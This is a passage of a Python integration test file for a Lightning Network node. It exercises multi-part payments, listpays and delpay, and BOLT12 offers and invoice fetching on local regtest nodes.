c34 = l3.rpc.listpeers(l4.info['id'])['peers'][0]['channels'][0]
assert(c12['spendable_msat'].millisatoshis < amt)
assert(c34['spendable_msat'].millisatoshis < amt)
bitcoind.generate_block(5)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 8)
inv = l4.rpc.invoice(
amt,
label="splittest",
description="Needs to be split into at least 2"
)['bolt11']
p = l1.rpc.pay(inv)
from pprint import pprint
pprint(p)
pprint(l1.rpc.paystatus(inv))
def test_pay_fail_unconfirmed_channel(node_factory, bitcoind):
'''
Replicate #3855.
`pay` crash when any direct channel is still
unconfirmed.
'''
l1, l2 = node_factory.get_nodes(2)
amount_sat = 10 ** 6
# create l2->l1 channel.
l2.fundwallet(amount_sat * 5)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.rpc.fundchannel(l1.info['id'], amount_sat * 3)
# channel is still unconfirmed.
# Attempt to pay from l1 to l2.
# This should fail since the channel capacities are wrong.
invl2 = l2.rpc.invoice(Millisatoshi(amount_sat * 1000), 'i', 'i')['bolt11']
with pytest.raises(RpcError):
l1.rpc.pay(invl2)
# Let the channel confirm.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# Now give enough capacity so l1 can pay.
invl1 = l1.rpc.invoice(Millisatoshi(amount_sat * 2 * 1000), 'j', 'j')['bolt11']
l2.rpc.pay(invl1)
# Wait for us to recognize that the channel is available
wait_for(lambda: l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat'].millisatoshis > amount_sat * 1000)
# Now l1 can pay to l2.
l1.rpc.pay(invl2)
def test_bolt11_null_after_pay(node_factory, bitcoind):
l1, l2 = node_factory.get_nodes(2)
amount_sat = 10 ** 6
# pay a generic bolt11 and test if the label bol11 is null
# inside the command listpays
# create l2->l1 channel.
l2.fundwallet(amount_sat * 5)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.rpc.fundchannel(l1.info['id'], amount_sat * 3)
# Let the channel confirm.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_NORMAL')
amt = Millisatoshi(amount_sat * 2 * 1000)
invl1 = l1.rpc.invoice(amt, 'j', 'j')['bolt11']
l2.rpc.pay(invl1)
pays = l2.rpc.listpays()["pays"]
assert(pays[0]["bolt11"] == invl1)
assert('amount_msat' in pays[0] and pays[0]['amount_msat'] == amt)
assert('created_at' in pays[0])
def test_mpp_presplit_routehint_conflict(node_factory, bitcoind):
'''
We had a bug where pre-splitting the payment prevents *any*
routehints from being taken.
We tickle that bug here by building l1->l2->l3, but with
l2->l3 as an unpublished channel.
If the payment is large enough to trigger pre-splitting, the
routehints are not applied in any of the splits.
'''
l1, l2, l3 = node_factory.get_nodes(3)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1l2, _ = l1.fundchannel(l2, 10**7, announce_channel=True)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l3, 10**7, announce_channel=False)
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# Wait for l3 to learn about l1->l2, otherwise it will think
# l2 is a deadend and not add it to the routehint.
wait_for(lambda: len(l3.rpc.listchannels(l1l2)['channels']) >= 2)
inv = l3.rpc.invoice(Millisatoshi(2 * 10000 * 1000), 'i', 'i', exposeprivatechannels=True)['bolt11']
l1.rpc.pay(inv)
def test_delpay_argument_invalid(node_factory, bitcoind):
"""
This test includes all possible combinations of input error inside the
delpay command.
"""
# Create the line graph l2 -> l1 with a channel of 10 ** 5 sat!
l2, l1 = node_factory.line_graph(2, fundamount=10**5, wait_for_announce=True)
with pytest.raises(RpcError):
l2.rpc.delpay()
# sanity check
inv = l1.rpc.invoice(10 ** 5, 'inv', 'inv')
payment_hash = "AA" * 32
with pytest.raises(RpcError):
l2.rpc.delpay(payment_hash, 'complete')
l2.rpc.pay(inv['bolt11'])
wait_for(lambda: l2.rpc.listpays(inv['bolt11'])['pays'][0]['status'] == 'complete')
payment_hash = inv['payment_hash']
    # payment paid with wrong status (pending status is an illegal input)
with pytest.raises(RpcError):
l2.rpc.delpay(payment_hash, 'pending')
with pytest.raises(RpcError):
l2.rpc.delpay(payment_hash, 'invalid_status')
with pytest.raises(RpcError):
l2.rpc.delpay(payment_hash, 'failed')
# test if the node is still ready
payments = l2.rpc.delpay(payment_hash, 'complete')
assert payments['payments'][0]['bolt11'] == inv['bolt11']
assert len(payments['payments']) == 1
assert len(l2.rpc.listpays()['pays']) == 0
def test_delpay_payment_split(node_factory, bitcoind):
"""
Test behavior of delpay with an MPP
"""
    MPP_TARGET_SIZE = 10**7  # Taken from libplugin-pay.c
amt = 5 * MPP_TARGET_SIZE
l1, l2, l3 = node_factory.line_graph(3, fundamount=10**5,
wait_for_announce=True)
inv = l3.rpc.invoice(amt, 'lbl', 'desc')
l1.rpc.pay(inv['bolt11'])
assert len(l1.rpc.listpays()['pays']) == 1
delpay_result = l1.rpc.delpay(inv['payment_hash'], 'complete')['payments']
assert len(delpay_result) >= 5
assert len(l1.rpc.listpays()['pays']) == 0
def test_listpay_result_with_paymod(node_factory, bitcoind):
"""
    The object of this test is to verify the correct behavior
    of the RPC command listpays with two different types of
    payment: keysend (without an invoice) and pay (with an invoice).
l1 -> keysend -> l2
l2 -> pay invoice -> l3
"""
amount_sat = 10 ** 6
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
invl2 = l2.rpc.invoice(amount_sat * 2, "inv_l2", "inv_l2")
l1.rpc.pay(invl2['bolt11'])
l2.rpc.keysend(l3.info['id'], amount_sat * 2, "keysend_l3")
assert 'bolt11' in l1.rpc.listpays()['pays'][0]
assert 'bolt11' not in l2.rpc.listpays()['pays'][0]
assert 'payment_hash' in l2.rpc.listpays()['pays'][0]
assert 'payment_hash' in l1.rpc.listpays()['pays'][0]
assert 'destination' in l1.rpc.listpays()['pays'][0]
assert 'destination' in l2.rpc.listpays()['pays'][0]
@unittest.skipIf(env('COMPAT') != 1, "legacypay requires COMPAT=1")
def test_listpays_ongoing_attempt(node_factory, bitcoind, executor):
"""Test to reproduce issue #3915.
    The issue is that the bolt11 string is not initialized if the root payment
    was split (no attempt with the bolt11 annotation ever hit `lightningd`,
    hence we cannot filter by that). In addition, keysends never have a bolt11
    string, so we need to switch to payment_hash comparisons anyway.
"""
plugin = os.path.join(os.path.dirname(__file__), 'plugins', 'hold_htlcs.py')
l1, l2, l3 = node_factory.line_graph(3, opts=[{}, {}, {'plugin': plugin}],
wait_for_announce=True)
f = executor.submit(l1.rpc.keysend, l3.info['id'], 100)
l3.daemon.wait_for_log(r'Holding onto an incoming htlc')
l1.rpc.listpays()
f.result()
inv = l2.rpc.invoice(10**6, 'legacy', 'desc')['bolt11']
l1.rpc.legacypay(inv)
l1.rpc.listpays()
# Produce loads of parts to increase probability of hitting the issue,
# should result in 100 splits at least
inv = l3.rpc.invoice(10**9, 'mpp invoice', 'desc')['bolt11']
# Start the payment, it'll get stuck for 10 seconds at l3
executor.submit(l1.rpc.pay, inv)
l1.daemon.wait_for_log(r'Split into [0-9]+ sub-payments due to initial size')
l3.daemon.wait_for_log(r'Holding onto an incoming htlc')
# While that is going on, check in with `listpays` to see if aggregation
# is working.
l1.rpc.listpays()
# Now restart and see if we still can aggregate things correctly.
l1.restart()
l1.rpc.listpays()
@pytest.mark.developer("needs use_shadow")
def test_mpp_waitblockheight_routehint_conflict(node_factory, bitcoind, executor):
'''
We have a bug where a blockheight disagreement between us and
the receiver causes us to advance through the routehints a bit
too aggressively.
'''
l1, l2, l3 = node_factory.get_nodes(3)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1l2, _ = l1.fundchannel(l2, 10**7, announce_channel=True)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l3, 10**7, announce_channel=False)
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# Wait for l3 to learn about l1->l2, otherwise it will think
# l2 is a deadend and not add it to the routehint.
wait_for(lambda: len(l3.rpc.listchannels(l1l2)['channels']) >= 2)
# Now make the l1 payer stop receiving blocks.
def no_more_blocks(req):
return {"result": None,
"error": {"code": -8, "message": "Block height out of range"}, "id": req['id']}
l1.daemon.rpcproxy.mock_rpc('getblockhash', no_more_blocks)
# Increase blockheight by 2, like in test_blockheight_disagreement.
bitcoind.generate_block(2)
sync_blockheight(bitcoind, [l3])
inv = l3.rpc.invoice(Millisatoshi(2 * 10000 * 1000), 'i', 'i', exposeprivatechannels=True)['bolt11']
# Have l1 pay l3
def pay(l1, inv):
l1.rpc.dev_pay(inv, use_shadow=False)
fut = executor.submit(pay, l1, inv)
# Make sure l1 sends out the HTLC.
l1.daemon.wait_for_logs([r'NEW:: HTLC LOCAL'])
# Unblock l1 from new blocks.
l1.daemon.rpcproxy.mock_rpc('getblockhash', None)
# pay command should complete without error
fut.result(TIMEOUT)
@pytest.mark.developer("channel setup very slow (~10 minutes) if not DEVELOPER")
@pytest.mark.slow_test
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
@unittest.skipIf(True, "Temporarily disabled while flake diagnosed: blame Rusty!")
def test_mpp_interference_2(node_factory, bitcoind, executor):
'''
We create a "public network" that looks like so.
Each channel is perfectly balanced, with 7 * unit
funds on each side.
4 -- 5
| /|
| / |
| / |
|/ |
6 -- 7
l1 is the payee, who will later issue some invoices.
It arranges unpublished channels from the above public
network:
l5->l1: 7 * unit
l6->l1: 5 * unit
l4->l1: 3 * unit
l7->l1: 2 * unit
l2 and l3 are payers.
They create some unpublished channels to the public network:
l2->l4, l2->l6: 6 * unit each
l3->l7, l3->l6: 6 * unit each
Finally, l1 issues 6 * unit invoices, simultaneously, to l2 and l3.
Both of them perform `pay` simultaneously, in order to test if
they interfere with each other.
This test then tries to check if both of them can pay, given
that there is sufficient incoming capacity, and then some,
to the payee, and the public network is perfectly balanced
with more than sufficient capacity, as well.
'''
opts = {'feerates': (1000, 1000, 1000, 1000)}
l1, l2, l3, l4, l5, l6, l7 = node_factory.get_nodes(7, opts=opts)
# Unit
unit = Millisatoshi(11000 * 1000)
# Build the public network.
public_network = [l4.fundbalancedchannel(l5, unit * 14),
l4.fundbalancedchannel(l6, unit * 14),
l5.fundbalancedchannel(l6, unit * 14),
l5.fundbalancedchannel(l7, unit * 14),
l6.fundbalancedchannel(l7, unit * 14)]
# Build unpublished channels to the merchant l1.
l4.rpc.connect(l1.info['id'], 'localhost', l1.port)
l5.rpc.connect(l1.info['id'], 'localhost', l1.port)
l6.rpc.connect(l1.info['id'], 'localhost', l1.port)
l7.rpc.connect(l1.info['id'], 'localhost', l1.port)
# If we're 'dual-funding', turn off the reciprocal funding
# so that we can fund channels without making them balanced
if EXPERIMENTAL_DUAL_FUND:
for n in [l1, l2, l3, l4, l5, l6, l7]:
n.rpc.call('funderupdate', {'fund_probability': 0})
# The order in which the routes are built should not matter so
# shuffle them.
incoming_builders = [lambda: l5.fundchannel(l1, int((unit * 7).to_satoshi()), announce_channel=False),
lambda: l6.fundchannel(l1, int((unit * 5).to_satoshi()), announce_channel=False),
lambda: l4.fundchannel(l1, int((unit * 3).to_satoshi()), announce_channel=False),
lambda: l7.fundchannel(l1, int((unit * 2).to_satoshi()), announce_channel=False)]
random.shuffle(incoming_builders)
for b in incoming_builders:
b()
# Build unpublished channels from the buyers l2 and l3.
l2.rpc.connect(l4.info['id'], 'localhost', l4.port)
l2.rpc.connect(l6.info['id'], 'localhost', l6.port)
l3.rpc.connect(l7.info['id'], 'localhost', l7.port)
l3.rpc.connect(l6.info['id'], 'localhost', l6.port)
l2.fundchannel(l4, int((unit * 6).to_satoshi()), announce_channel=False)
l2.fundchannel(l6, int((unit * 6).to_satoshi()), announce_channel=False)
l3.fundchannel(l7, int((unit * 6).to_satoshi()), announce_channel=False)
l3.fundchannel(l6, int((unit * 6).to_satoshi()), announce_channel=False)
# Now wait for the buyers to learn the entire public network.
bitcoind.generate_block(5)
sync_blockheight(bitcoind, [l1, l2, l3, l4, l5, l6, l7])
for channel in public_network:
wait_for(lambda: len(l2.rpc.listchannels(channel)['channels']) == 2)
wait_for(lambda: len(l3.rpc.listchannels(channel)['channels']) == 2)
# At this point, we have the following incoming channel capacities:
# 74094000, 52314000, 30318000, 19318000
# We *always* rotate through, since we have no published channels,
# but we can select badly and get an overlap. e.g. first invoice
# takes 30318000, 19318000 and 74094000. Second will then take
# 52314000, and have to reuse 30318000, which gets exhausted by the
# first payer, thus leaving them unable to pay 66000000.
# So we re-do this until we only have 4 or fewer routehints.
while True:
# Buyers check out some purchaseable stuff from the merchant.
i2 = l1.rpc.invoice(unit * 6, ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20)), 'i2')['bolt11']
i3 = l1.rpc.invoice(unit * 6, ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20)), 'i3')['bolt11']
if len(l1.rpc.decodepay(i2)['routes'] + l1.rpc.decodepay(i3)['routes']) <= 4:
break
# Pay simultaneously!
p2 = executor.submit(l2.rpc.pay, i2)
p3 = executor.submit(l3.rpc.pay, i3)
# Both payments should succeed.
p2.result(TIMEOUT)
p3.result(TIMEOUT)
def test_large_mpp_presplit(node_factory):
"""Make sure that ludicrous amounts don't saturate channels
We aim to have at most PRESPLIT_MAX_SPLITS HTLCs created directly from the
`presplit` modifier. The modifier will scale up its target size to
guarantee this, while still bucketizing payments that are in the following
range:
```
target_size = PRESPLIT_MAX_SPLITS^{n} + MPP_TARGET_SIZE
target_size < amount <= target_size * PRESPLIT_MAX_SPLITS
```
"""
PRESPLIT_MAX_SPLITS = 16
MPP_TARGET_SIZE = 10 ** 7
amt = 400 * MPP_TARGET_SIZE
l1, l2, l3 = node_factory.line_graph(
3, fundamount=10**8, wait_for_announce=True,
opts={'wumbo': None}
)
inv = l3.rpc.invoice(amt, 'lbl', 'desc')['bolt11']
p = l1.rpc.pay(inv)
assert(p['parts'] <= PRESPLIT_MAX_SPLITS)
inv = l3.rpc.listinvoices()['invoices'][0]
assert(inv['msatoshi'] == inv['msatoshi_received'])
@pytest.mark.developer("builds large network, which is slow if not DEVELOPER")
@pytest.mark.slow_test
def test_mpp_overload_payee(node_factory, bitcoind):
"""
We had a bug where if the payer is unusually well-connected compared
to the payee, the payee is unable to accept a large payment since the
payer will split it into lots of tiny payments, which would choke the
max-concurrent-htlcs limit of the payee.
"""
# Default value as of this writing.
# However, with anchor commitments we might be able to safely lift this
# default limit in the future, so explicitly put this value here, since
# that is what our test assumes.
opts = {'max-concurrent-htlcs': 30}
l1, l2, l3, l4, l5, l6 = node_factory.get_nodes(6, opts=opts)
# Respect wumbo.
# Using max-sized channels shows that the issue is not capacity
# but rather max-concurrent-htlcs.
# This is grade-school level.
amt = 2**24 - 1
# Build the public network.
# l1 is the very well-connected payer.
# l2 is the poorly-connected payee.
# l3->l6 are well-connected hop nodes.
public_network = [l1.fundbalancedchannel(l3, amt),
l1.fundbalancedchannel(l4, amt),
l1.fundbalancedchannel(l5, amt),
l1.fundbalancedchannel(l6, amt),
l2.fundbalancedchannel(l6, amt),
l3.fundbalancedchannel(l4, amt),
l3.fundbalancedchannel(l5, amt),
l3.fundbalancedchannel(l6, amt),
l4.fundbalancedchannel(l5, amt),
l5.fundbalancedchannel(l6, amt)]
# Ensure l1 knows the entire public network.
bitcoind.generate_block(5)
sync_blockheight(bitcoind, [l1, l2, l3, l4, l5, l6])
for c in public_network:
wait_for(lambda: len(l1.rpc.listchannels(c)['channels']) >= 2)
# Now create a 400,000-sat invoice.
# This assumes the MPP presplitter strongly prefers to
# create lot sizes of 10,000 sats each.
# This leads the presplitter to prefer to split into
# around 40 HTLCs of 10,000 sats each, but since
# max-concurrent-htlcs is set to 30, l2 would be unable
# to receive.
inv = l2.rpc.invoice(Millisatoshi(400000 * 1000), 'i', 'i')['bolt11']
# pay.
l1.rpc.pay(inv)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "this is always on with EXPERIMENTAL_FEATURES")
def test_offer_needs_option(node_factory):
"""Make sure we don't make offers without offer command"""
l1 = node_factory.get_node()
with pytest.raises(RpcError, match='Unknown command'):
l1.rpc.call('offer', {'amount': '1msat', 'description': 'test'})
with pytest.raises(RpcError, match='Unknown command'):
l1.rpc.call('fetchinvoice', {'offer': 'aaaa'})
def test_offer(node_factory, bitcoind):
plugin = os.path.join(os.path.dirname(__file__), 'plugins/currencyUSDAUD5000.py')
l1 = node_factory.get_node(options={'plugin': plugin, 'experimental-offers': None})
bolt12tool = os.path.join(os.path.dirname(__file__), "..", "devtools", "bolt12-cli")
# Try different amount strings
for amount in ['1msat', '0.1btc', 'any', '1USD', '1.10AUD']:
ret = l1.rpc.call('offer', {'amount': amount,
'description': 'test for ' + amount})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
assert offer['bolt12'] == ret['bolt12']
assert offer['offer_id'] == ret['offer_id']
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('ASCII')
if amount == 'any':
assert 'amount' not in output
else:
assert 'amount' in output
# Try wrong amount precision:
with pytest.raises(RpcError, match='Currency AUD requires 2 minor units'):
l1.rpc.call('offer', {'amount': '1.100AUD',
'description': 'test for invalid amount'})
with pytest.raises(RpcError, match='Currency AUD requires 2 minor units'):
l1.rpc.call('offer', {'amount': '1.1AUD',
'description': 'test for invalid amount'})
# Make sure it fails on unknown currencies.
with pytest.raises(RpcError, match='No values available for currency EUR'):
l1.rpc.call('offer', {'amount': '1.00EUR',
'description': 'test for unknown currency'})
# Test label and description
weird_label = 'label \\ " \t \n'
weird_desc = 'description \\ " \t \n ナンセンス 1杯'
ret = l1.rpc.call('offer', {'amount': '0.1btc',
'description': weird_desc,
'label': weird_label})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
assert offer['label'] == weird_label
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'description: ' + weird_desc in output
# Test vendor
weird_vendor = 'description \\ " \t \n ナンセンス 1杯'
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'vendor test',
'vendor': weird_vendor})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'vendor: ' + weird_vendor in output
# Test quantity min/max
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_min test',
'quantity_min': 1})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'quantity_min: 1' in output
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'quantity_max': 2})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'quantity_max: 2' in output
# Test absolute_expiry
exp = int(time.time() + 2)
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'absolute_expiry': exp})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'absolute_expiry: {}'.format(exp) in output
# Recurrence tests!
for r in [['1second', 'seconds', 1],
['10seconds', 'seconds', 10],
['1minute', 'seconds', 60],
['10minutes', 'seconds', 600],
['1hour', 'seconds', 3600],
['10hours', 'seconds', 36000],
['1day', 'days', 1],
['10days', 'days', 10],
['1week', 'days', 7],
['10weeks', 'days', 70],
['1month', 'months', 1],
['10months', 'months', 10],
['1year', 'years', 1],
['10years', 'years', 10]]:
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': r[0]})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every {} {}\n'.format(r[2], r[1]) in output
# Test limit
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_limit': 5})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds limit 5\n' in output
# Test base
# (1456740000 == 10:00:00 (am) UTC on 29 February, 2016)
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_base': '@1456740000'})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds start 1456740000' in output
assert '(can start any period)' not in output
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_base': 1456740000})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds start 1456740000' in output
assert '(can start any period)' in output
# Test paywindow
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_paywindow': '-10+20'})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds paywindow -10 to +20\n' in output
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_paywindow': '-10+600%'})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds paywindow -10 to +600 (pay proportional)\n' in output
def test_fetchinvoice(node_factory, bitcoind):
# We remove the conversion plugin on l3, causing it to get upset.
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True,
opts=[{'experimental-offers': None},
{'experimental-offers': None},
{'experimental-offers': None,
'allow_broken_log': True}])
# Simple offer first.
offer1 = l3.rpc.call('offer', {'amount': '2msat',
'description': 'simple test'})
inv1 = l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12']})
inv2 = l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12']})
assert inv1 != inv2
assert 'next_period' not in inv1
assert 'next_period' not in inv2
assert only_one(l3.rpc.call('listoffers', [offer1['offer_id']])['offers'])['used'] is False
l1.rpc.pay(inv1['invoice'])
assert only_one(l3.rpc.call('listoffers', [offer1['offer_id']])['offers'])['used'] is True
l1.rpc.pay(inv2['invoice'])
assert only_one(l3.rpc.call('listoffers', [offer1['offer_id']])['offers'])['used'] is True
# We can also set the amount explicitly, to tip.
inv1 = l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12'], 'msatoshi': 3})
assert l1.rpc.call('decode', [inv1['invoice']])['amount_msat'] == 3
l1.rpc.pay(inv1['invoice'])
# More than ~5x expected is rejected as absurd (it's actually a divide test,
# which means we need 15 here, not 11).
with pytest.raises(RpcError, match="Remote node sent failure message.*Amount vastly exceeds 2msat"):
l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12'], 'msatoshi': 15})
# Underpay is rejected.
with pytest.raises(RpcError, match="Remote node sent failure message.*Amount must be at least 2msat"):
l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12'], 'msatoshi': 1})
# Single-use invoice can be fetched multiple times, only paid once.
offer2 = l3.rpc.call('offer', {'amount': '1msat',
'description': 'single-use test',
'single_use': True})['bolt12']
inv1 = l1.rpc.call('fetchinvoice', {'offer': offer2})
inv2 = l1.rpc.call('fetchinvoice', {'offer': offer2})
assert inv1 != inv2
assert 'next_period' not in inv1
assert 'next_period' not in inv2
l1.rpc.pay(inv1['invoice'])
# We can't pay the other one now.
with pytest.raises(RpcError, match="INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS.*'erring_node': '{}'".format(l3.info['id'])):
l1.rpc.pay(inv2['invoice'])
# We can't reuse the offer, either.
with pytest.raises(RpcError, match='Offer no longer available'):
l1.rpc.call('fetchinvoice', {'offer': offer2})
# Recurring offer.
offer3 = l2.rpc.call('offer', {'amount': '1msat',
'description': 'recurring test',
'recurrence': '1minutes'})
assert only_one(l2.rpc.call('listoffers', [offer3['offer_id']])['offers'])['used'] is False
ret = l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 0,
'recurrence_label': 'test recurrence'})
period1 = ret['next_period']
assert period1['counter'] == 1
assert period1['endtime'] == period1['starttime'] + 59
assert period1['paywindow_start'] == period1['starttime'] - 60
assert period1['paywindow_end'] == period1['endtime']
assert only_one(l2.rpc.call('listoffers', [offer3['offer_id']])['offers'])['used'] is False
l1.rpc.pay(ret['invoice'], label='test recurrence')
assert only_one(l2.rpc.call('listoffers', [offer3['offer_id']])['offers'])['used'] is True
ret = l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 1,
'recurrence_label': 'test recurrence'})
period2 = ret['next_period']
assert period2['counter'] == 2
assert period2['starttime'] == period1['endtime'] + 1
assert period2['endtime'] == period2['starttime'] + 59
assert period2['paywindow_start'] == period2['starttime'] - 60
assert period2['paywindow_end'] == period2['endtime']
# Can't request 2 before paying 1.
with pytest.raises(RpcError, match='previous invoice has not been paid'):
l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 2,
'recurrence_label': 'test recurrence'})
l1.rpc.pay(ret['invoice'], label='test recurrence')
# Now we can, but it's too early:
with pytest.raises(RpcError, match="Too early: can't send until time {}".format(period1['starttime'])):
l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 2,
'recurrence_label': 'test recurrence'})
# Wait until the correct moment.
while time.time() < period1['starttime']:
time.sleep(1)
l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 2,
'recurrence_label': 'test recurrence'})
# Check we can request invoice without a channel.
l4 = node_factory.get_node(options={'experimental-offers': None})
l4.rpc.connect(l2.info['id'], 'localhost', l2.port)
ret = l4.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 0,
'recurrence_label': 'test nochannel'})
# Now, test amount in different currency!
plugin = os.path.join(os.path.dirname(__file__), 'plugins/currencyUSDAUD5000.py')
l3.rpc.plugin_start(plugin)
offerusd = l3.rpc.call('offer', {'amount': '10.05USD',
'description': 'USD test'})['bolt12']
inv = l1.rpc.call('fetchinvoice', {'offer': offerusd})
assert inv['changes']['msat'] == Millisatoshi(int(10.05 * 5000))
# If we remove plugin, it can no longer give us an invoice.
l3.rpc.plugin_stop(plugin)
with pytest.raises(RpcError, match="Internal error"):
l1.rpc.call('fetchinvoice', {'offer': offerusd})
l3.daemon.wait_for_log("Unknown command 'currencyconvert'")
# But we can still pay the (already-converted) invoice.
l1.rpc.pay(inv['invoice'])
# Test timeout.
l3.stop()
with pytest.raises(RpcError, match='Timeout waiting for response'):
l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12'], 'timeout': 10})
# Now try an offer with a more complex paywindow (only 10 seconds before)
offer = l2.rpc.call('offer', {'amount': '1msat',
'description': 'paywindow test',
'recurrence': '20seconds',
'recurrence_paywindow': '-10+0'})['bolt12']
ret = l1.rpc.call('fetchinvoice', {'offer': offer,
'recurrence_counter': 0,
'recurrence_label': 'test paywindow'})
period3 = ret['next_period']
assert period3['counter'] == 1
assert period3['endtime'] == period3['starttime'] + 19
assert period3['paywindow_start'] == period3['starttime'] - 10
assert period3['paywindow_end'] == period3['starttime']
l1.rpc.pay(ret['invoice'], label='test paywindow')
# We can get another invoice, as many times as we want.
# (It may return the same one!).
while int(time.time()) <= period3['paywindow_start']:
time.sleep(1)
l1.rpc.call('fetchinvoice', {'offer': offer,
'recurrence_counter': 1,
'recurrence_label': 'test paywindow'})
l1.rpc.call('fetchinvoice', {'offer': offer,
'recurrence_counter': 1,
'recurrence_label': 'test paywindow'})
# Wait until too late!
while int(time.time()) <= period3['paywindow_end']:
time.sleep(1)
with pytest.raises(RpcError, match="Too late: expired time {}".format(period3['paywindow_end'])):
l1.rpc.call('fetchinvoice', {'offer': offer,
'recurrence_counter': 1,
'recurrence_label': 'test paywindow'})
def test_pay_waitblockheight_timeout(node_factory, bitcoind):
plugin = os.path.join(os.path.dirname(__file__), 'plugins', 'endlesswaitblockheight.py')
l1, l2 = node_factory.line_graph(2, opts=[{}, {'plugin': plugin}])
sync_blockheight(bitcoind, [l1, l2])
inv = l2.rpc.invoice(42, 'lbl', 'desc')['bolt11']
with pytest.raises(RpcError, match=r'WIRE_INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
l1.rpc.pay(inv)
# Post mortem checks that we tried only once.
status = l1.rpc.paystatus(inv)
# Should have only one attempt that triggered the wait, which then failed.
assert len(status['pay']) == 1
assert len(status['pay'][0]['attempts']) == 1
def test_sendinvoice(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2, wait_for_announce=True,
opts={'experimental-offers': None})
# Simple offer to send money (balances channel a little)
offer = l1.rpc.call('offerout', {'amount': '100000sat',
'description': 'simple test'})
# Fetchinvoice will refuse, since you're supposed to send an invoice.
with pytest.raises(RpcError, match='Offer wants an invoice, not invoice_request'):
l2.rpc.call('fetchinvoice', {'offer': offer['bolt12']})
# used will be false
assert only_one(l1.rpc.call('listoffers', [offer['offer_id']])['offers'])['used'] is False
# sendinvoice should work.
